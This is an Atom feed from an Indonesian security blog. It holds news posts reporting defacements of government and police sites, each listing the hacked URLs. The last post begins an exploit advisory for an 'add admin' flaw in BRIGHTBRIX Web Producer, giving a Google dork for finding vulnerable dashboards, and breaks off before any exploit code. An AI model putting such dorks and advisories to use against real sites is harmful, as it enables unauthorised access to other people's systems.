<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1481717144980864440</id><updated>2019-04-09T00:38:59.937-07:00</updated><category term="Tutorial"/><category term="Deface"/><category term="News"/><category term="Security"/><category term="Tools"/><category term="Internet"/><category term="Cyber Attack"/><category term="Shell"/><category term="Technology"/><category term="Linux"/><category term="Server"/><category term="Exploit"/><category term="Cyber Crime"/><category term="DOWNLOAD"/><category term="Malware"/><category term="Government"/><category term="Perl"/><category term="Rooting"/><category term="SQL"/><category term="Software"/><category term="Windows"/><category term="Blogging"/><category term="Java Script"/><category term="Keylogger"/><category term="Pentest"/><category term="Php"/><category term="RCE"/><category term="ASP"/><category term="Android"/><category term="CSS"/><category term="Carding"/><category term="DNS"/><category term="Google"/><category term="Microsoft"/><category term="Wordpress"/><title type='text'>Bandung Digital Security</title><subtitle type='html'>Most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity researchers, hackers, technologists, enthusiasts and nerds.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default?start-index=26&amp;max-results=25&amp;redirect=false'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>94</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-9178076783195925302</id><published>2018-12-13T23:13:00.001-08:00</published><updated>2018-12-13T23:15:36.971-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Government"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><title type='text'>Hacker Galau Meretas 2 Subdomain KPU</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-J_ITfF2BRGI/XBNXySEb3PI/AAAAAAAAABk/11fAsb8ECaoFqr_JA7hxF89bqEBy58SHgCLcBGAs/s1600/Screenshot%2B%2528302%2529.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;709&quot; data-original-width=&quot;1327&quot; height=&quot;212&quot; src=&quot;https://3.bp.blogspot.com/-J_ITfF2BRGI/XBNXySEb3PI/AAAAAAAAABk/11fAsb8ECaoFqr_JA7hxF89bqEBy58SHgCLcBGAs/s400/Screenshot%2B%2528302%2529.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;Memang bicara&amp;nbsp; tentang berita peretasan dinegeri sendiri tidak ada habisnya, Kali ini hacker dengan codename &lt;b&gt;Khatulistiwa&lt;/b&gt; meretas situs KPU Papua dan KPU Kabupaten Bulukumba yang beralamatkan di kpu-papua.go.id dan kab-bulukumba.kpu.go.id, Dilihat dari script pelaku nampaknya hacker yang satu ini sedang galau, Berikut pesan yang di tinggalkan oleh pelaku;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Rindu masa-masa itu&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;TR1PL3_D0WN - Khatulistiwa - D4RK_CYB3R - Mr.4c1L Cr0tZz - XALVADOR_ - s1sskayy_cyb3r - PyschoRzy - KEC0A_T3RBANG - C0RT3X&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;Dalam peretasan kali ini memang pelaku memang tidak merusak halaman depan dan hanya menitipkan file touch.html, memang hacker indonesia suka &quot;iseng&quot; dan melampiaskan ke-galauannya di situs-situs pemerintah. Berikut subdomain KPU yang diretas oleh pelaku:&lt;br /&gt;&lt;br /&gt;http://papua.kpu.go.id/touch.html&lt;br /&gt;http://kab-bulukumba.kpu.go.id/touch.html&lt;br /&gt;&lt;br /&gt;Saat berita ini rilis, Situs KPU Papua masih dalam keadaan diretas dan belum ada perbaikan dari admin pengelola website.&lt;br /&gt;&lt;br /&gt;Sekian berita hari ini. Terima kasih sudah berkunjung have a nice day :)&lt;br /&gt;&lt;br /&gt;&lt;i&gt;-pixelscoders&lt;/i&gt;&lt;br /&gt;&lt;b&gt;(14/12/18) 14:05&amp;nbsp;&lt;/b&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/9178076783195925302/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/12/hacker-galau-meretas-2-subdomain-kpu.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/9178076783195925302'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/9178076783195925302'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/12/hacker-galau-meretas-2-subdomain-kpu.html' title='Hacker Galau Meretas 2 Subdomain KPU'/><author><name>SnoopySec</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-J_ITfF2BRGI/XBNXySEb3PI/AAAAAAAAABk/11fAsb8ECaoFqr_JA7hxF89bqEBy58SHgCLcBGAs/s72-c/Screenshot%2B%2528302%2529.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-423077706839884068</id><published>2018-12-11T22:49:00.000-08:00</published><updated>2018-12-11T22:49:56.940-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Government"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><title type='text'>Kritikan Di Situs Birohukum Jogjakarta</title><content type='html'>Bicara tentang peretasan di negeri sendiri memang tidak ada habisnya, kali ini hacker dengan codename &lt;b&gt;TehSariwangi404&lt;/b&gt; dengan &lt;b&gt;Mum3i &lt;/b&gt;beraksi, Mereka&amp;nbsp;meretas website Birohukum Yogyakarta yang beralamatkan di &lt;b&gt;http://birohukum.jogjaprov.go.id/&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-VE16300njdc/XBCupaLpVkI/AAAAAAAAABY/a-3PIoK8AekPmDECse4P0m1pzah6irmYQCLcBGAs/s1600/Screenshot%2B%2528299%2529.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;703&quot; data-original-width=&quot;1327&quot; height=&quot;211&quot; src=&quot;https://4.bp.blogspot.com/-VE16300njdc/XBCupaLpVkI/AAAAAAAAABY/a-3PIoK8AekPmDECse4P0m1pzah6irmYQCLcBGAs/s400/Screenshot%2B%2528299%2529.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Memang halaman depan website masih terlihat normal, Namun jika membuka &lt;b&gt;http://birohukum.jogjaprov.go.id/Ind3x.html&lt;/b&gt; berubah dengan background hitam serta terpampang manusia badut yang identik dengan film &quot;IT&quot; yang disutradari Andy Muschietti. Pada peretasan kali ini pelaku sangat menyindir bagaimana tentang kinerja hukum yang ada di Indonesia. Berikut pesan yang ditinggal oleh pelaku:&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;TehSquadCyber&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Hacked By TehSariwangi Ft Mum3i&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Bagaimana dengan hukum di Indonesia?&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Ketika yang LANCIP kebawah dan yang TUMPUL keatas&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Seperti itulah hukum sekarang:)&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Backup?&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;index.php.back&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;Memang negeri ini penuh dengan ketidak-adilan dan tentu kita semua mempunyai pendapat masing masing yang ingin diungkap kan, dari Kritikan di Birohukum Yogyakarta kita bisa lihat yang mungkin seseorang dengan mudah nya menyampaikan pendapat dengan cara yang salah, karena tindakan ini adalah sebuah kejahatan karena merusak karya orang lain.&lt;br /&gt;&lt;br /&gt;Dan terakhir sampai berita ini diturunkan belum ada sama sekali perbaikan dari pihak admin website itu sendiri. Terima kasih sudah berkunjung. Have a nice day :)&lt;br /&gt;&lt;br /&gt;&lt;i&gt;-pixelscoders&lt;/i&gt;&lt;br /&gt;&lt;b&gt;(12/12/18) 13:31&amp;nbsp;&lt;/b&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/423077706839884068/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/12/kritikan-di-situs-birohukum-jogjakarta.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/423077706839884068'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/423077706839884068'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/12/kritikan-di-situs-birohukum-jogjakarta.html' title='Kritikan Di Situs Birohukum Jogjakarta'/><author><name>SnoopySec</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-VE16300njdc/XBCupaLpVkI/AAAAAAAAABY/a-3PIoK8AekPmDECse4P0m1pzah6irmYQCLcBGAs/s72-c/Screenshot%2B%2528299%2529.png" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-2621666513940006759</id><published>2018-12-11T00:21:00.001-08:00</published><updated>2018-12-11T00:21:52.239-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Government"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><title type='text'>Polda Kepulauan Riau Disambangi Hacker</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-kqwagX31600/XA9xh55yx4I/AAAAAAAAABQ/CoH7WjKSgFAPfJ9VUGjIfSj3E9oGpZPyQCEwYBhgL/s1600/Screenshot%2B%2528298%2529.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;705&quot; data-original-width=&quot;1327&quot; height=&quot;212&quot; src=&quot;https://4.bp.blogspot.com/-kqwagX31600/XA9xh55yx4I/AAAAAAAAABQ/CoH7WjKSgFAPfJ9VUGjIfSj3E9oGpZPyQCEwYBhgL/s400/Screenshot%2B%2528298%2529.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;Kali ini duet hacker dengan indonesia kembali beraksi, duet hacker ini meretas Polda Kepulauan Riau beserta subdomainnya yang memiliki alamat website poldakepri.net, Pelaku mengganti halaman utama dari situs tersebut, tidak jelas alasan pelaku meretas Polda Kepulauan Riau , pelaku hanya meninggalkan pesan dan juga team yang lain&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&amp;nbsp;Hacked By KID2ZON3 - ./E4OXY&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Teruntuk masa lalu, berhentilah menepuk punggungku. Aku tidak ingin melihat ke belakang&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;\Greetz/&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Anon Cyber Team - IndoXploit Coders Team - N45HT - 99Syndicate&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;-Indonesia Hacker Rulez-&amp;nbsp;&lt;/b&gt;&amp;nbsp;&lt;/div&gt;&lt;br /&gt;Sampai saat berita ini dirilis, Domain Polda Kepulauan Riau beserta subdomainnya tersebut masih dalam keadaan diretas dan belum ada perbaikan dari pihak pengelola website. Berikut subdomain yang diretas oleh pelaku&lt;br /&gt;&lt;br /&gt;http://poldakepri.net/&lt;br /&gt;http://barelang.poldakepri.net/&lt;br /&gt;http://ditnarkoba.poldakepri.net/&lt;br /&gt;http://ditreskrimsus.poldakepri.net/&lt;br /&gt;http://ditreskrimum.poldakepri.net/&lt;br /&gt;http://karimun.poldakepri.net/&lt;br /&gt;http://laporanpolisi.poldakepri.net/&lt;br /&gt;http://spdp1.poldakepri.net/&lt;br /&gt;http://subdit.poldakepri.net/&lt;br /&gt;http://tersangka.poldakepri.net/&lt;br /&gt;http://tes.poldakepri.net/&lt;br /&gt;http://uji.poldakepri.net/&lt;br /&gt;http://web.poldakepri.net/&lt;br /&gt;&lt;br /&gt;Dengan melihat seperti ini tidak terjadi lagi karena ini sangat merugikan bagi semua orang yang ingin mengakses website tersebut. Dan untuk si peretas tindakan ini bisa berujung dengan pasal yang berlaku dan bisa di adili dipersidangan.&lt;br /&gt;&lt;br /&gt;Sekian untuk berita hari ini, terimakasih sudah berkunjung have a nice day.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;-pixelscoders&lt;/i&gt;&lt;br /&gt;&lt;b&gt;(11/12/18)&lt;/b&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/2621666513940006759/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/12/polda-kepulauan-riau-disambangi-hacker.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/2621666513940006759'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/2621666513940006759'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/12/polda-kepulauan-riau-disambangi-hacker.html' title='Polda Kepulauan Riau Disambangi Hacker'/><author><name>SnoopySec</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-kqwagX31600/XA9xh55yx4I/AAAAAAAAABQ/CoH7WjKSgFAPfJ9VUGjIfSj3E9oGpZPyQCEwYBhgL/s72-c/Screenshot%2B%2528298%2529.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-5130666752678900511</id><published>2018-12-09T07:21:00.001-08:00</published><updated>2018-12-11T00:14:05.970-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Government"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><title type='text'>Hacker Iseng Retas Situs Kabupaten Balangan</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-YMLyaeozQt8/XA0ykdC7dHI/AAAAAAAAABA/if3wkozJeuYn0xNh5DufwxXtLZIQ5uefQCLcBGAs/s1600/Screenshot%2B%2528291%2529.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;705&quot; data-original-width=&quot;1335&quot; height=&quot;210&quot; src=&quot;https://4.bp.blogspot.com/-YMLyaeozQt8/XA0ykdC7dHI/AAAAAAAAABA/if3wkozJeuYn0xNh5DufwxXtLZIQ5uefQCLcBGAs/s400/Screenshot%2B%2528291%2529.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;Lagi lagi situs tanah air kembali tumbang karena ulah usil hacker yang kali ini dengan codename &lt;b&gt;4LM05TH3V!L&lt;/b&gt; beraksi, pelaku tersebut meretas domain utama kabupaten balangan dan subdomainya, Tidak diketahui apa motif dari pelaku, pelaku hanya meninggalkan pesan singkat dan juga beberapa codename seperti dibawah ini,&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;w00tz???&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Owned by 4LM05TH3V!L&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Hidden Ghost Team&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;-=[ Shootz ]=-&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;M1NT_1X - EppCrazy - Mr.TR1N1TY - Mr.Chip21 - Doraemon v1.5 - Mr.xBarakuda - Desktop77N3T&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Cyberpunks - ./Mr.Tahu - ./C3W3KBerB4T4n9 - limit[ed] - Mr.b0t4k - TN72 - TehTawar404&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;© Hidden Ghost Team&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;Sampai saat berita ini dirilis, Domain dan subdomain kota Balangan tersebut masih dalam keadaan diretas dan belum ada perbaikan dari pengelola website. Berikut domain yang diretas oleh pelaku;&lt;br /&gt;&lt;br /&gt;http://balangankab.go.id&lt;br /&gt;http://awayan.balangankab.go.id/lin.php&lt;br /&gt;http://dinaskearsipan.balangankab.go.id/lin.php&lt;br /&gt;http://disdukcapil.balangankab.go.id/lin.php&lt;br /&gt;http://dishub.balangankab.go.id/lin.php&lt;br /&gt;http://dpmptsp.balangankab.go.id/lin.php&lt;br /&gt;http://jdih.balangankab.go.id/lin.php&lt;br /&gt;http://kelurahanpartim.balangankab.go.id/lin.php&lt;br /&gt;http://kesbangpol.balangankab.go.id/lin.php&lt;br /&gt;http://korpri.balangankab.go.id/lin.php&lt;br /&gt;http://mediacenter.balangankab.go.id/lin.php&lt;br /&gt;http://p2tpm.balangankab.go.id/lin.php&lt;br /&gt;http://pariwisata.balangankab.go.id/lin.php&lt;br /&gt;http://rsud.balangankab.go.id/lin.php&lt;br /&gt;&lt;br /&gt;Dan mirrornya kalian bisa lihat disini:&lt;br /&gt;http://www.zone-h.org/archive/notifier=4LM05TH3V!L&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Semoga tidak ada lagi situs indonesia yang tumbang hanya karena keisengan dari para hacker indonesia. Sekian untuk berita hari ini, terimakasih sudah berkunjung.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;-pixelscoders&lt;/i&gt;&lt;br /&gt;&lt;b&gt;(9/12/2019) 22:17&lt;/b&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/5130666752678900511/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/12/hacker-iseng-retas-situs-kabupaten.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/5130666752678900511'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/5130666752678900511'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/12/hacker-iseng-retas-situs-kabupaten.html' title='Hacker Iseng Retas Situs Kabupaten Balangan'/><author><name>SnoopySec</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-YMLyaeozQt8/XA0ykdC7dHI/AAAAAAAAABA/if3wkozJeuYn0xNh5DufwxXtLZIQ5uefQCLcBGAs/s72-c/Screenshot%2B%2528291%2529.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-7689192503883787519</id><published>2018-09-05T21:37:00.000-07:00</published><updated>2018-09-05T21:41:53.625-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Crime"/><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Pentest"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><title type='text'>BRIGHTBRIX® Web Producer - Extending the Internet Add Admin Vulnerability</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-sx9_5sHDmdE/W5Cv0wpSXiI/AAAAAAAAAME/v_Y3FGpUGc8VV81RcVCOcPI3Y8ZD5v6sQCLcBGAs/s1600/Brighbrix.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;315&quot; data-original-width=&quot;851&quot; height=&quot;236&quot; src=&quot;https://4.bp.blogspot.com/-sx9_5sHDmdE/W5Cv0wpSXiI/AAAAAAAAAME/v_Y3FGpUGc8VV81RcVCOcPI3Y8ZD5v6sQCLcBGAs/s640/Brighbrix.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;=====================================================================&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Exploit Title : BRIGHTBRIX® Web Producer Add Admin Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Author&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; : Zaenal Arifin&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Exploit Date&amp;nbsp; : September 06, 2018&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Software&amp;nbsp; &amp;nbsp; &amp;nbsp; : https://www.brightbrix.com/&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Vendor&lt;span style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&amp;nbsp; &amp;nbsp;: https://www.brightbrix.com/&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Version&lt;span style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&amp;nbsp; &amp;nbsp;: -&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Home&lt;span style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&amp;nbsp; &amp;nbsp;: www.bandungdigitalsecurity.org&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Tested on&amp;nbsp; &amp;nbsp; &amp;nbsp;: Windows 7/10 64x - BackBox Linux 5.0 64x&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Exploit Risk&amp;nbsp; &amp;nbsp;: Medium&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;=====================================================================&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Proof of Concept :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Search in google browser or another browser and use the dork :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Dashboard for BRIGHTBRIX® Web Producer - Extending the Internet&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;and us ur brain to develop this dork.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;and Use Exploit :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 